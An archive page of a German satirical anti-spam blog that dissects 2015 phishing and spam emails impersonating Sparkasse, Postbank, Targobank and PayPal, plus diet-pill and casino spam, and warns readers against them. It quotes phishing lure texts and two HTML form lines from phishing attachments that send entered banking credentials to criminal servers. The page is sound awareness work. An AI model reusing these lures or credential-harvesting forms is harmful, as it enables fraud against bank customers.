Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Schlagwortarchiv „Screenshot“

Sparkasse Online-Konto Aktualisierung

Donnerstag, 13. August 2015

Sehr geehrter Kunde,

Genau mein Name!

HINWEIS: Zugriff auf Ihr Online-Konto läuft kurz.

HINWEIS: Zugriff auf das Spammerhirnchen läuft knapp.

Um weiterhin diesen Vorteil zu nutzen, bitten wir Sie Daten auf den folgenden Link, um zu bestätigen.

Sparkasse Online-Konto Aktualisierung: klicken Sie hier

Toll, in ein gecracktes WordPress-Blog! Da glaubt jeder – die Spam ist ja auch sprachlich wieder einmal extragut geraten – sofort an die Sparkasse und gibt deshalb in einem „Antrag“ lauter Daten ein…

Screenshot eines Details der Phishing-Seite

…die die echte Sparkasse schon lange kennt. Egal, was für einen Sinn das haben soll. So kommen Verbrecher an Konten anderer Leute und an Adressmaterial für betrügerischen Identitätsmissbrauch.

Gut, dass die meisten Phisher so stümperhaft sind.

Schlimm, dass es trotzdem zu funktionieren scheint.

Dank für Ihre Mitarbeit und Verständnis.

Mit freundlichen Grüßen.
Ihre Sparkasse Kundenservice.

Mit mechanischem Gruß vom Phisher.

Stagefright-Virus bedroht ihr Konto

Dienstag, 11. August 2015

Das Wichtigste vorab: Diese E-Mail kommt nicht von der Postbank. Es ist Phishing und der Versuch, ihnen einen Trojaner unterzujubeln. Löschen sie diese E-Mail! Wenn sie das mir als „irgendeinem dahergelaufenen Blogger“ nicht glauben wollen (was durchaus vernünftig ist, denn sie kennen mich nicht und ich kann ein beliebiger Vollidiot sein), überzeugen sie sich davon, indem sie kostenlos bei der Postbank-Hotline für Sicherheitsfragen unter der Telefonnummer 0800 1008906 anrufen und dort noch einmal nachfragen! Und nachdem sie dort die Bestätigung gehört haben, löschen sie diese Spam! Die Postbank versendet solche E-Mails nicht. Kommen sie auf gar keinen Fall auf die Idee, wegen einer E-Mail einer Bank irgendwelche Daten irgendwo einzugeben! Egal, was der Grund dafür sein soll! Es ist eine sehr schlechte Idee, die sie viel Geld kosten kann und ihnen monatelangen Ärger aller Art einbringen kann. Und wenn sie schon die Hotline anrufen, stellen sie dort auch gleich die Frage, warum vor dieser sehr gefährlichen laufenden Betrugsnummer noch nicht prominent auf der Kundenwebsite der Postbank gewarnt wird, denn zurzeit scheint bei der Postbank noch niemand auf diese naheliegende Idee gekommen zu sein – obwohl dort ansonsten geradezu vorbildlich auf gängige Betrugsmaschen hingewiesen wird. Eine prominent platzierte Warnung könnte so viel Schaden verhindern und kostet dabei so wenig Aufwand…

So, jetzt aber…

Es war ja klar, dass die Spammer darauf aufspringen würden. Wer auch nur eine Spur Verantwortung fühlt, wird allerdings niemals auf die Idee gekommen sein, seine Kontoführung mit einem Wischofon¹ zu machen – denn in diesen werksseitig funktionslimitierten Computern für Dumme verbindet sich die Security-Blauäugigkeit der Neunziger Jahre mit der technisch kompetenten organisierten Kriminalität der Zehner Jahre.

Tja, und wer seine Kontoführung nicht mit so einem gefährlichen Spielzeugtelefon macht, der lacht schon beim Anblick des Betreffs, lehnt sich zurück und hat eine Möglichkeit weniger, mit derart plumpen Nummern überrumpelt zu werden.

Diese Spam habe ich übrigens nicht selbst empfangen, sie wurde mir von einem Freund mit Konto bei der Postbank zugesteckt, der schon wegen des…

Von: „Postbank.de“ <do-not-reply@postbank.de>

…in der Spam angegebenen Absenders verunsichert war, ob sie nicht echt sein könnte. Ich hoffe, er hat sich jetzt für alle Zeiten gemerkt, das der Absender einer E-Mail ohne Aufwand gefälscht werden kann und somit gar nichts über die Herkunft einer E-Mail sagt. Was Banken tun können, um solche Verunsicherungen bei Empfängern von kriminellen Phishing-Spams zu verhindern, habe ich schon vor vier Jahren geschrieben und werde es hier nicht wiederholen. Dass die meisten Banken immer noch nichts tun, ist ein Beleg dafür, dass ihnen ihre Kunden egal sind und dass sie sich nicht daran stören, wenn Kriminelle das Geld ihrer Kunden für dicke Autos, Kokain und Prostituierte ausgeben können. Als Kunde einer solchen Bank würde ich die darin ausgedrückte Verachtung in vollem Umfang zurückgeben und mir einen seriöseren Dienstleister für meine Geldsachen suchen.

Sehr geehrte/r Kunde,

Weder kennt diese „Postbank“ den Namen des Empfängers, noch macht sie eine Angabe, auf welches Konto sich diese Mail bezieht². Spätestens an dieser Stelle sollte jedem Empfänger klar sein, dass es sich um eine Spam handelt.

Die Postbank Sicherheitszentrale [sic! Deppen Leer Zeichen] warnt vor einer Sicherheitslücke beim Smartphone-Betriebssystem Android von Google. Hacker könnten die Daten einfach per MMS stehlen [sic!] und ihr Handy karpern. Der Virus schleicht sich von alleine in ihr System [sic! Komma fehlt.] ohne dass Sie es bemerken.

Ich gehe darauf inhaltlich nicht weiter ein, außer vielleicht diese eine Kleinigkeit: Es geht bei Stagefright nicht um „Daten per MMS stehlen“, sondern um „beliebigen Code in eine MMS (oder ein irgendwie, zum Beispiel bei einem Hangout, vom Wischofon verarbeitetes Video) einbetten und unbemerkt ausführen“. Der „Postbank Sicherheitszentale“ aus der wirren Kopfwelt dieser Spammer scheint das nicht so völlig klar zu sein, und offenbar setzen die Kriminellen auch darauf…

Einen ausführlichen Bericht über den Stagefright Virus finden sie auf Hier [sic!]

…dass ihre Opfer mit dem verlinkten Artikel auf Zeit Online intellektuell überfordert sind. Das sind ja immerhin Buchstaben, die Text formen, der gelesen werden will – und übrigens recht unklar ist, da er mutmaßlich von einem Journalisten ohne vertiefte technische Kenntnisse verfasst wurde. Eine etwas klarere Darlegung gibt es bei Heise Online.

So schützt die Postbank Sie!

1. Wenn Sie im Besitz einen Android-Handys dann folgen Sie bitte den Anweisungen!

Aha, die „Postbank“ schützt mich, indem ich den Anweisungen folge. Vielleicht sollten die „Sicherheitsexperten“ dort mal einen Deutschexperten einstellen, damit die Formulierungen nicht so mies klingen… 😀

2. Klicken Sie „hier“ oder öffnen Sie die Datei in ihrem E-Mail Anhang!

Ein Klick auf „Click here“ in einer digital unsignierten Mail eines Unbekannten ist immer ein ganz besonders großer Beitrag zur Computersicherheit… :mrgreen:

3. Füllen Sie alle Daten aus und bestätigen Sie auf „Daten absenden“

Ich denke, die „Postbank“ will mich schützen. Stattdessen soll ich einen Anhang öffnen und ausfüllen. Dieser Anhang ist übrigens eine HTML-Datei. Wer Interesse daran hat: den Quelltext habe ich bei Pastebin hochgeladen. Das Wichtigste steht in Zeile 110, ich habe hier mal den interessanten Teil isoliert:

<form ... action="http://b.adress-datenabgleich.com/postbank_check.php" ...>

Die eingegebenen Daten gehen nicht an einen Server in der Domain der Postbank, sondern über die obskure und vor ein paar Tagen anonym registrierte Domain adress (strich) datenabgleich (punkt) com an einen von Verbrechern kontrollierten Server, der zu diesem Zeitpunkt erfreulicherweise schon vom Internet genommen wurde. (Ein Dank an den Hoster für die schnelle Reaktion! Aber es kann ja auch nicht jeder so langsam wie die Postbank sein, wenn millionenfacher Betrug durchgeführt wird…)

Welche Daten das sind? Diese Daten hier:

Screenshot des Anhanges mit einer Phishing-Seite im Design der Postbank. Unter der Überschrift 'Postbank Stagefright Virus entfernen' soll die E-Mail-Adresse, die Kontonummer und ein Passwort oder eine PIN eingegeben werden.

Wer den Verbrechern so Zugriff auf das Postbank-Konto gegeben hat und ihnen bestätigt hat, unter welcher Adresse die Spam ankommt und beklickt wird, darf sich schon „freuen“:

Screenshot des zweiten Schrittes der Phishing-Seite. Text: Weiteres vorgehen [sic!] -- Wir senden ihnen umgehend eine E-Mail mit einer Software, mit der Sie den Stagefright-Virus entfernen können. -- Gehen Sie Schritt für Schritt nach unserer Anleitung vor und entfernen sie den Stagefright-Virus. -- Sollten Sie nicht wie vorgeschrieben den Stagefright-Virus entfernen und ein Schaden ensteht [sic!], ist die Postbank nicht verpflichtet den Schaden zu erstatten.

Der nigelnagelneue Trojaner, den garantiert noch kein Antivirus-Schlangenöl kennt, wird gleich hinterhergeliefert.

Wir senden ihnen umgehend eine E-Mail mit einer Software mit der Sie den Stagefright-Virus entfernen können.

Die allerdings sehr naheliegende Frage, warum die „Postbank“ nicht gleich jedem ihrer angemailten Kunden eine E-Mail mit einer derartigen Software zusenden sollte, die beantwortet der freundliche Phisher und Cracker nicht.

Übrigens ist „Stagefright“ kein Virus, außer vielleicht in einem eher skurillen Sinn des Wortes. Es ist eine schwere, auf vielerlei Wegen ausbeutbare Sicherheitslücke in Android.

Mit freundlichen Grüßen
Ihre Sabine Heinel
Postbank Newsletter-Redaktion

Wenn das die Freundlichkeit ist, will man den Hass nicht mehr kennenlernen.

¹Wischofon ist mein deutsches Wort für das Reklamewort „smart phone“. Es bezeichnet den Gegenstand nach der Tätigkeit, die am häufigsten auf ihn ausgeführt wird: Wischen mit den Fingern. Ich meine das nicht als Schimpfwort.

²Es ist gar nicht selten, dass jemand mehrere Konten hat.

Re: Signed Invoice

Donnerstag, 6. August 2015

Die ist ja kurz!

Dear Sir,
The attached invoice is for FYI.

Best Regards.

So weit, so schlecht. Bei diesem kurz angebundenen Text erwarte ich eine knackige EXE-Datei in einem ZIP-Archiv; aber nein, es handelt sich wirklich um ein PDF. Dieses PDF sieht aber nicht aus wie eine Rechnung, sondern es sieht so aus:

Screenshot eines Teils des PDFs

So sieht zumindest die obere rechte Ecke des PDFs aus. Sie zeigt den Hinweis, dass es eine angehängte Datei gibt (als ob man das nicht in seiner Mailsoftware gesehen hätte), ein übergroßes PDF-Piktogramm und einen klicki klicki Linktext mit „Click here“. Der Link aus dem PDF ist kein direkter Link, sondern wird über einen URL-Kürzungsdienst umgeleitet. Und zwar auf eine Website…

Screenshot der gefährlichen Website

…die so tut, als sei sie Google, die aber in wenig überraschender Weise mit Google…

Detail: Die angezeigte URL in der Adressleiste des Browsers

…so viel zu tun hat wie eine kaputte Glühlampe mit dem hellen, warmen Sonnenlicht. Natürlich muss man Javascript freischalten, um irgendwas auf dieser Website von Kriminellen zu machen, und was man sich dort alles einfangen kann, verrät schon die Spam, der falsche Eindruck, es handele sich um Google und die merkwürdige Art, in der ein Link auf diese Site platziert wurde.

Selbstverständlich wird – neben dem angebotenen Download von Daten, die Kriminelle mit einer Spam untergejubelt haben – auch gleich das Google-Passwort abgefragt und zu diesem Geschmeiß gesendet, wenn man auf „Download“ klickt – aber ich hatte bei dem schönen Wetter heute keine Lust, den Rest der Javascript-Quelltexte zu lesen. Wenn es neben Phishing auch noch eine aktuelle Kollektion Schadsoftware gibt, bin ich davon nicht überrascht.

Was diese Spam interessant macht, obwohl sie in ihrer Machart eher primitiv ist: Die frühere Vorgehensweise mit dem „Dokument im ZIP-Archiv“ scheint für die Verbrecher nicht mehr so erfolgversprechend zu sein – was leider nicht heißt, dass ich solche Spams nicht mehr sähe – und so suchen sie nach neuen Wegen, um Leute zu überrumpeln.

Deshalb: Immer aufmerksam bleiben! Vor allem, wenn Unbekannte „Rechnungen“ oder „Mahnungen“ in Mailanhängen versenden, aber im Text der Mail nichts Substanzielles mitzuteilen haben (weil man sonst sofort bemerken würde, dass es sich um gegenstandslose Behauptungen handelt). So einen Müll einfach löschen und vergessen, es gibt nämlich Schöneres im Internet als Trojaner und sonstige Schadsoftware.

Lead Generation

Mittwoch, 5. August 2015

Diese textlich ziemlich dämliche Spam sei in ihrer ganzen HTML-Herrlichkeit als Screenshot wiedergegeben:

Screenshot der HTML-formatierten Spam mit dem obskur bleibenden Text: Sie zahlen nur, wenn wir Interessierte Käufer finden (Leads) -- Überspringen Sie den Teil der Überzeugung des Verkaufsprozesses; gehen Sie direkt zu den Verhandlungen über den richtigen Preis. Wir stellen sicher, dass Ihr Angebot die erste Wahl auf dem Markt ist. Diejenigen die am Kauf interessiert sind, werden direkt mit Ihnen in Verbindung gebracht. Alles, was Sie tun müssen, ist den Deal abzuschließen! Klicken Sie hier, um ein Angebot für Lead-Generierung zu erhalten.

Am gelungensten finde ich übrigens das Bild mit den Fragezeichen im Footer. Es gibt geradezu perfekt wieder, was ich mir auch gedacht habe. Auch dieser Spammer hat den Teil der Überzeugung übersprungen… :mrgreen:

Endlich Rezeptfrei: 10 KG in 30 Tagen abnehmen

Dienstag, 4. August 2015

Hach, endlich wieder Spam¹! 😀

Guten Tag n ,

Gute Nacht!

möchten Sie abnehmen ohne Sport zu machen und ohne zu hungern?

Warum sollte ich das wollen? Weil ich immer so schöne, photoshop-gebaute Reklamebilder von Menschen sehe, die halbverhungert aussehen? Da wäre ich aber ganz schön blöd, wenn ich mich so leicht von einem menschenfeindlichen Pack wie den Werbeheins beeinflussen ließe.

Ja, das ist jetzt möglich.

Testen Sie Deutschlands erfolgreichstes Diätmittel.

Ohne Nebenwirkungen – schneller Erfolg!

Ein Mittel ohne Nebenwirkungen hat im Allgemeinen auch keine Wirkung. Selbst Placebos, die außer dem Glauben bei der Einnahme keinerlei wirksame Substanz enthalten, haben Nebenwirkungen.

Aber hat denn wirklich jemand geglaubt, in einer illegalen und asozialen Spam würde auch nur ein wahres Wort stehen?

http://www.wundermittel-zum-abnehmen.com/[ID entfernt]

Die tolle Wundermittel-Domain wurde gestern erst registriert, und zwar von einem Zeitgenossen, der seine bei der Registrierung angegebenen Daten lieber über einen Whois-Anonymisierer aus dem sonnigen Panama verbergen lässt. Das macht aber nichts, denn dort gibt es gar keine Website, sondern nur…

Screenshot eines Terminals mit der Ausgabe von lynx -dump -mime_header, die den reinen Weiterleitungscharakter der Domain belegt

…eine Weiterleitung in die weniger gelungen benannte Domain www (punkt) abnehmen (strich) wundermittel (punkt) com, die ebenfalls gestern anonym registriert wurde. Da gibt es dann aber auch keine „richtige“ Website, sondern…

Screenshot eines Terminals mit der Ausgabe von lynx -dump -mime_header, das den Quelltext offenbart

…einfach nur ein HTML-Frameset mit einem einzigen Frame, so dass eine weitere fragwürdige Website aufgerufen werden kann und dabei für den Betrachter unsichtbar eine Affiliate-ID übergeben werden kann. Denn davon lebt dieser widerliche Spammer: Von Affiliate-Judasgroschen und dem gestörten Selbstbild bei vielen Empfängern. Dass er mit seinen Tun dazu beiträgt, andere Menschen – vor allem junge, psychisch noch nicht gefestigte und von Selbstzweifeln zerfressene Frauen – in die Psychiatrie, die Drogenkarriere oder gar in den Selbstmord zu treiben, ist ihm egal, solange die Kasse stimmt.

Im Durchschnitt können Sie bis zu 10 KG in nur 4 Wochen verlieren.

Seltsam. Auf der lustigen Website zum mutmaßlichen Betrugsprodukt sind es bis zu 15 kg in nur vier Wochen. Na ja, da steht ja auch „bis zu“, da könnten also sogar „bis zu dreihundert kg“ zugesagt werden, und das wäre sogar erfüllt, wenn man zunähme, also minus fünf Kilo „verlöre“. Ja, ich schreibe verwirrend und des Konjunktivs seltener Klang machts nicht klarer, deshalb noch einmal ganz kurz: Eine Zusage „bis zu“ ist keine Zusage. Eine Zusage mit „mindestens“ ist eine Zusage. Und wenn es jetzt jemand immer noch nicht versteht, hier meine „Zusage“: Wer mir für dieses Blog jetzt mindestens fünf Euro spendet, wird im nächsten Monat bis zu 15 Kilo abnehmen. Ohne zu hungern und ohne Sport zu treiben. Echt jetzt! Garantiert! 😈

Das verkaufte Zeug ist hier übrigens ein alter Bekannter. Es wird immer noch vor allem über illegale und asoziale Spam vermarktet. Was das bedeutet, kann sich jeder mit einem nicht abgemagerten Gehirn selbst ausrechnen. Hinweis für Hirnverhungerte: Es bedeutet nicht, dass es ein gutes und wirksames, preiswert erhältliches Mittel ist. Von Experimenten rate ich dringend ab, und für einen Identitätsmissbrauch hinreichende Daten sollte kein Mensch auf irgendeiner Website angeben, von der er nur über Spam erfährt.

Für Ihre offenen Fragen rufen Sie uns einfach an!

Zu schade, dass dieser Spammer seine Telefonnummer nicht angibt.

Mit freundlichen Grüssen,
Ihre Online Apotheke

Eine Apotheke mit äußerst einseitigem Angebot: Bauchweg-Quacksalberei.

¹Für alle, die es nicht gemerkt haben: Der Server ist umgezogen. Und dabei habe ich gleich noch die Hürden für meine werten Mitmenschen von Spammern etwas höher gesetzt, weil die Fluten so groß geworden sind.

Wichtig: Datenspeicherung

Donnerstag, 16. Juli 2015

Diese E-Mail mit dem gefälschten Absender service (at) paypal (punkt) com kommt natürlich nicht von PayPal, sondern von Kriminellen – und darin ist eine sehr originelle Phishing-Masche, von der ich erwarte, sie in den nächsten Tagen noch häufiger zu sehen:

Screenshot der Phishing-Spam -- PayPal -- E-Mail Adresse (unkenntlich gemacht), Datum 15. Juli 2015 -- Wichtiger Hinweis zur Datenspeicherung -- Guten Tag (Name unkenntlich gemacht), Wie Sie bereits wissen, wurde die Vorratsdatenspeicherung per Gesetz verabschiedet und auch wir sind gezwungen zu handeln. Durch diese Gesetzesänderung werden Sie nun aufgefordert, Ihre bestehenden Daten zu bestätigen respektive zu aktualisieren! -- Zur Bestätigung

Die schwarzen Balken sind von mir. Die Spam kommt mit namentlicher Ansprache.

Natürlich ist die in der BRD eventuell demnächst geltende Vorratsdatenspeicherung völlig irrelevant für ein Unternehmen wie PayPal, das seinen Sitz in Luxemburg hat. Aber auch, wenn PayPal in der BRD ansässig wäre: Die Vorratsdatenspeicherung ist in diesem Zusammenhang eine idiotische Begründung für eine Dateneingabe. PayPal speichert sowieso die Kundendaten und die Geschäftsvorfälle, das ist auch erforderlich, um die Dienstleistung PayPals anbieten zu können, während das neue Menschenüberwachungsgesetz der Bundesrepublik Deutschland Anbieter von Kommunikationsdienstleistungen zu einer anlasslosen, vollständigen und betrieblich sinnlosen Überwachung ihrer Kunden verpflichtet.

Darüber hinaus sollte sich jeder PayPal-Kunde im Klaren sein, dass PayPal nach eigenen Angaben derartige E-Mails niemals an seine Kunden versendet:

Wir fordern Sie nie auf, persönliche Daten direkt auf einer Website einzugeben. Wenn wir Ihre Hilfe benötigen, fragen wir Sie immer über eine Nachricht in Ihrem PayPal-Konto

Mit diesem Wissen ist es eine Kleinigkeit, jede Phishing-Spam für PayPal-Kunden zu erkennen und direkt ins Tönnchen zu befördern. Auch, wenn sie originell formuliert ist, in überzeugendem Design kommt und eine namentliche Ansprache hat.

Die Regel lautet: Es kommt angeblich von „PayPal“, fordert mich auf, Daten herzugeben (zu „bestätigen“, zu „verifizieren“, „abzugleichen“ und vieler Unfug mehr) und enthält etwas zum Draufklicken, wo ich das tun soll? Das bedeutet, dass es sich um Phishing handelt.

Diese Spam ist ein Zustecksel meines Lesers E.T.

Gute Neuigkeiten von Christian

Samstag, 11. Juli 2015

Hallo,

Ich heiße aber „Hi“!

heute ist Ihr Glückstag! Ihr guter Freund Christian hat Sie eingeladen, ebenfalls bei uns im Ruby Palace Casino zu spielen. Er hat bereits mehr als 350 Euro beim Video Poker gewonnen.

Wow, habe ich heute ein Glück. Ich kriege Spam von Affiliate-Spammern, die Geld dafür kassieren, dass sie andere Leute in irgendwelche Abzock-Casinos im Internet treiben. Und diese Leute sagen auch noch was von „guter Freund“. Ich habe so ein Glück, ich könnte morden vor Glück!

Und er ist nicht der Einzige – dank Auszahlungsquoten, die 97% regelmäßig überschreiten, gibt es bei uns täglich große Gewinne. Und Sie könnten als Nächstes dabei sein. Falls Video Poker nicht so Ihr Ding ist… keine Sorge. Bei uns gibt es eine große Auswahl an Spielen, von klassischen Tischspielen wie Craps und Blackjack bis hin zu hochmodernen Spielautomaten wie Thunderstruck II und The Dark Knight™.

Und das ist ein ganz tolles Abzock-Casino. Da gibts ganz viele auf dem Bildschirm dargestellte „Spiele“, die mit viel Grafik so tun, als seien sie etwas anderes als die Anzeige eines Rechenvorgangs. Aber obwohl da Walzen, Würfel, Karten und Kugeln gezeigt werden, handelt es sich immer um ein vom Betreiber beliebig und unentdeckbar manipulierbares Ereignis. Und damit man diesem Betreiber vertraut, gibt es eine Flut von illegaler und asozialer Spam, die echt freundlich formuliert ist. Was wird es wohl bedeuten, dass diese Casino-Betreiber aus irgendeinem Grund der Meinung sind, dass sich ohne illegale und asoziale Spam niemand für ihre Abzock-Casinos interessiert? Ach! Vermutlich liegt das einfach daran, dass das so tolle Läden sind…

Jeder Freund von Christian ist ein Freund von uns und so geben wir Ihnen einen besonderen 200% Bonus auf Ihre erste Einzahlung, der Ihr Guthaben verdreifacht. Ein einzigartiges Angebot, dass garantiert von niemand anders übertroffen wird.

Und ein einzigartiges Angebot gibt es. Ich kann denen einen großen grünen 100-Euro-Schein geben, und die zeigen mir in einem Computerprogramm dann 300 Euro an. Das ist doch ein toller Tausch, da fühlste dich wie Hans im Glück! Wer könnte dazu „nein“ sagen?! :mrgreen:

Worauf warten Sie noch? Tragen Sie sich wie Christian auf der Liste der Gewinner ein. http://gsn-bau.de/yxvejfvh.htm

Um den Eindruck von Seriosität zu erhöhen, wird nicht etwa eine eigene Domain in der Spam verbrannt, sondern einfach eine Website von anderen Leuten – in diesem Fall die Bremer Gesellschaft für Gesamtkonzeptionen in Sanierung und Neubau¹ – mit einem Crack übernommen, und da wird dann die Weiterleitung draufgespielt. Und die ist nicht etwa so implementiert, wie das ein normaler Mensch machen würde, der seinen Code vielleicht auch mal pflegen und verstehen muss, sondern ein gutes Beispiel für Javascript-Missbrauch, damits auch bei automatischen Scans nicht so auffällt, was das für ein Rotz ist:

Screenshot des JavaScript-Codes, den ich mit Lynx in meinem Terminal abgerufen habe

So codet niemand, der kein Verbrecher ist.

Diese vorsätzlich kryptische Javascript-Code ist eine Weiterleitung in die Domain rubywebroyal (punkt) com, wo man das übliche potemkinsche „Casino“ von Affiliate-Spammern sehen kann:

Screenshot der betrügerischen Website

Das unterscheidet sich nicht von der Betrugssite, die im April des letzten Jahres unter einer anderen Domain vorlag. Damals war es aber „mein guter Freund Markus“, der mir ein „Casino“ empfohlen hat, von dem man nur aus der Spam erfährt – und das schon damals lieber seine Links über kriminell gecrackte Websites anderer Leute gesetzt hat.

Alles Gute!

Ihr könnt mich auch mal!

¹Der Mailserver der Sitebetreiber weigert sich, eine Mail von mir anzunehmen, und damit tuts mir auch nur noch halb so leid, wenn mit diesem Posting ein bisschen Reputation beschädigt wird. An sich ist mir Kommunikation lieber…

Targobank – Datenabgleich

Samstag, 4. Juli 2015

Aber ich bin da doch gar nicht Kunde. 😉

Absender: Targobank <direkt (at) targobank (punkt) de>

Dieser Absender ist gefälscht. (Jeder Absender in einer Spam ist gefälscht.) Diese E-Mail kommt nicht von der Targobank.

Screenshot der Darstellung der HTML-formatierten Spam in der Mailsoftware

Hui, Design!

Ich halte diese Phishing-Spam für gefährlich, weil sie überdurchschnittlich gut gemacht ist. Wer Kunde bei der Targobank ist und darauf reingefallen ist, sollte sich sofort mit der Bank in Verbindung setzen, um den Schaden zu minimieren.

Sehr geehrte Damen und Herren,

Genau mein Name! :mrgreen:

Eine richtige Bank würde ihre Kunden natürlich mit Namen ansprechen, und weil gar nicht so wenige Kunden mehrere Konten haben, würde sie auch noch erwähnen, auf welches Konto sich die Mail bezieht.

Ein Spammer kann im Allgemeinen – wenn er nicht aus einem Hack oder anderen Quellen eine Zuordnung von Mailadressen zu Bankdaten hat – nicht wissen, welche Kontonummer seine Empfänger haben. Ein vorsichtiger Umgang mit Bankdaten und die Verwendung einer eigenen E-Mail-Adresse ausschließlich für die Kommunikation mit der Bank sind ein wichtiger und sehr wirksamer Schutz gegen Phishing.

unser System hat festgestellt das Ihr Telefon-Banking PIN aus Sicherheitsgründen geändert werden muss.

Da bin ich aber froh, dass „euer System“ nicht festgestellt hat, dass ich ohne Grund 20.000 Øre berappen muss! :mrgreen:

Bitte nutzen das unten angefügte Formular um die Änderung Ihres Telefon-Banking PIN kostenfrei zu ändern.

Das „unten angefügte Formular“ ist eine an die Spam angehängte HTML-Datei, die im Browser so aussehen würde¹:

Screenshot der Darstellung des Anhangs der Targobank-Phishing-Mail in einem Webbrowser

Das Wichtigste daran ist, wo die eingegebenen Daten hingehen. Diese Frage beantwortet sich leicht durch einen Blick in den Quelltext der HTML-Datei:

<form [...] method="POST" action="http://a.dbbanking.ru/de/targo/login/targo.php"  >

Die Daten gehen also nicht zum Server der Targobank, sondern zum Server unter der von Kriminellen kontrollierten, russischen Domain a (punkt) dbbanking (punkt) ru. Das ist auch der Grund, weshalb man der „Targobank“ so viele Dinge sagen soll, die die richtige Targobank längst kennt, wenn man dort Kunde ist, zum Beispiel die eigene Kontonummer. Allein die hier angegebenen Daten reichen für die Übernahme des Kontos durch die Kriminellen, und ich bin mir sicher, dass nach dem Absenden noch weitere Daten für eine angebliche „Sicherheitsprüfung“ abgefragt werden – sehr beliebt sind wegen ihrer „vielseitigen kriminellen Verwendbarkeit“ Kreditkartendaten.

(Hinweis: Andernfalls belasten wir Ihr Konto mit 18,99€ und fordern die Änderung schriftlich über den Postweg bei Ihnen an.)

Damit ein Mensch auch so wirklich doof wird, darauf reinzufallen, wird er mit technokratischen Entgelt-Forderungen gefügig gemacht – so frei nach dem Motto: „Wir haben ein Sicherheitsproblem, zahlen sie bitte grundlos zwanzig Euro. Die Gebührentabelle, nach der wir dieses Geld erheben, haben wir uns einfach aus dem Hintern gezogen“.

Es handelt sich übrigens um langsame Verbrecher:

Ihren Telefon-Banking PIN können sie hier, oder wie folgt ändern:

1. Öffnen Sie die Datei im Anhang Ihrer Email und wählen Sie „öffnen mit“ aus.
2. Füllen Sie alle vorgesehenden Felder aus und klicken dann auf „Daten absenden“..
3. Ihr Telefon-Banking PIN aktiviert sich nach 5-7 Werktagen.

Die brauchen fast eine Woche, bis sie alles aus dem Konto rausgeholt haben, was sie rausholen wollen.

Für weitere Fragen ist unser Online Support unter: direkt (strich) pin (at) targobank (punkt) de 24Std. für Sie erreichbar.

Was, die sind nur 24 Stunden erreichbar? Und wenn die Frage einen Tag später kommt, hat man eben Pech gehabt? Tja, so etwas kommt raus, wenn die Phisher in Sprachen schreiben, deren Subtilitäten sie nicht verstehen. Ein Autor, der Deutsch kann, hätte „rund um die Uhr“ geschrieben und nicht das irreführende Ergebnis aus einer Computerübersetzung verwendet.

Es ist wieder einmal wie so oft bei den Phishing-Spams: Wenn der eigentliche Phishing-Kram formuliert ist, werden die Spammer oft ein wenig nachlässig und ihnen passieren kleine und zuweilen auch große und sehr peinliche Fehler. Wer sich nicht in Panik versetzen lässt (Sicherheitsmaßnahme der Bank, das wird teuer, wenn ich nicht reagiere) und gründlich liest, wird beinahe jede Phishing-Spam an solchen Details erkennen.

Targobank AG & Co. KG
Kasernenstr. 10
40213 Düsseldorf

Ihre Targobank

Wer es jetzt immer noch nicht bemerkt hat: Die Targobank hat mit dieser Spam nichts zu tun. Es ist eine Mail von Verbrechern, die ihre kriminellen Geschäfte mit fremden Konten machen wollen und die das Geld anderer Leute bei Koks und Nutten verprassen wollen.

Beratungstermin kostenlos unter:
info (at) targobank (punkt) de

Copyright © 2013 TARGOBANK

Oh, eine Mail von 2013 diente den Spammern als Vorlage… 😉

¹Ich rate strikt davon ab, Anhänge aus Spams zu öffnen, wenn man nicht weiß, wie man ein gut gesichertes System herstellt. Ein Virenscanner und eine „personal firewall“ machen kein gut gesichertes System. Das bisschen befriedigte Neugierde ist den möglichen Ärger niemals wert.

Diese Spam ist ein Zustecksel meines Lesers M.S.

Close

⚠️ Kein Adblocker erkannt 🛑

Bitte installieren Sie so schnell wie möglich einen Adblocker für ihren Webbrowser! Sie schützen damit die Ihren Computer vor Schadsoftware, die über Malvertising verteilt wird, und Sie schützen sich selbst vor Ausspähung und intransparentem Datenhandel durch halbseiden bis grenzkriminell vorgehende Wirtschaftsunternehmen. Das ist Grund genug, einen Adblocker zu verwenden. Aber gleichzeitig machen Sie auch Ihre gesamte Interneterfahrung schöner, erfreulicher und schneller. Ich empfehle uBlock Origin.